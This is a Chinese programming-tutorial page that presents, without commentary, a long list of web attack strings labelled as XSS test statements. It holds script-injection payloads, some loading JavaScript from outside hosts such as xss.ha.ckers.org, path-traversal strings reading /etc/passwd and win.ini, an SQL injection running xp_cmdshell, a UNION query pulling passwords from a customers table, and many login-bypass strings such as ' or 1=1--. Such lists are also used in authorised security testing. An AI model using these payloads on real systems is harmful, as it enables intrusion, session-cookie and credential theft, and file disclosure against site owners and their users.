威凡网全力打造:网页编程、软件开发编程、平面设计、服务器端开发、操作系统等在线学习平台!学编程,上威凡网!
ASP教程>> ASP基础 应用技巧 数据库相关 ASP类 存储过程 FSO专栏 ASP其他
当前位置:首页 > ASP教程 > ASP其他
上一节
 XSS测试语句大全
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3cscript%3ealert('xss')%3c/script%3e
<script>alert('xss')</script>
<img src="javascript:alert('xss')">
%0a%0a<script>alert("vulnerable")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('vulnerable');</script>
<script>alert('vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('vulnerable')</script>
a/
a?<script>alert('vulnerable')</script>
"><script>alert('vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:inetpubwwwroot?.txt'--&&
%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e
%3cscript%3ealert(document. domain);%3c/script%3e&
%3cscript%3ealert(document.domain);%3c/script%3e&session_id={session_id}&session_id=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
................windowssystem.ini
................windowssystem.ini
'';!--"<xss>=&{()}
<img src="javascript:alert('xss');">
<img src=javascript:alert('xss')>
<img src=javascript:alert('xss')>
<img src=javascript:alert("xss")>
<img src=javascript:alert('xss')>
<img src=javascript:alert('xss')>
<img src=javascript:alert('xss')>
<img src="jav ascript:alert('xss');">
<img src="jav ascript:alert('xss');">
<img src="jav ascript:alert('xss');">
"<img src=javascript:alert("xss")>";' > out
<img src=" javascript:alert('xss');">
<script>a=/xss/alert(a.source)</script>
<body background="javascript:alert('xss')">
<body onload=alert('xss')>
<img dynsrc="javascript:alert('xss')">
<img lowsrc="javascript:alert('xss')">
<bgsound src="javascript:alert('xss');">
<br size="&{alert('xss')}">
<layer src="http://xss.ha.ckers.org/a.js"></layer>
<link rel="stylesheet" href="javascript:alert('xss');">
<img src='vbscript:msgbox("xss")'>
<img src="mocha:[code]">
<img src="livescript:[code]">
<meta http-equiv="refresh" content="0;url=javascript:alert('xss');">
<iframe src=javascript:alert('xss')></iframe>
<frameset><frame src=javascript:alert('xss')></frame></frameset>
<table background="javascript:alert('xss')">
<div style="background-image: url(javascript:alert('xss'))">
<div style="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<div style="width: expression(alert('xss'));">
<style>@import'javascript:alert("xss")';</style>
<img style='xss:expression(alert("xss"))'>
<style type="text/javascript">alert('xss');</style>
<style type="text/css">.xss{background-image:url("javascript:alert('xss')");}</style><a class=xss></a>
<style type="text/css">body{background:url("javascript:alert('xss')")}</style>
<base href="javascript:alert('xss');//">
geturl("javascript:alert('xss')")
a="get";b="url";c="javascript:";d="alert('xss');";eval(a+b+c+d);
<xml src="javascript:alert('xss');">
"> <body onload="a();"><script>function a(){alert('xss');}</script><"
<script src="http://xss.ha.ckers.org/xss.jpg"></script>
<img src="javascript:alert('xss')"
<!--#exec cmd="/bin/echo '<script src'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></script>'"-->
<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<script a=">" src="http://xss.ha.ckers.org/a.js"></script>
<script =">" src="http://xss.ha.ckers.org/a.js"></script>
<script a=">" '' src="http://xss.ha.ckers.org/a.js"></script>
<script "a='>'" src="http://xss.ha.ckers.org/a.js"></script>
<script>document.write("<scri");</script>pt src="http://xss.ha.ckers.org/a.js"></script>
<a href=http://www.gohttp://www.google.com/ogle.com/>link</a>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
申明:本教程内容由威凡网编辑整理并提供IT程序员分享学习,如文中有侵权行为,请与站长联系(QQ:254677821)!
上一节
相关教程  
其他教程  
ASP基础
应用技巧
数据库相关
ASP类
存储过程
FSO专栏
ASP其他

违法和不良信息举报中心】邮箱:254677821@qq.com
Copyright©威凡网 版权所有 苏ICP备2023020142号
站长QQ:254677821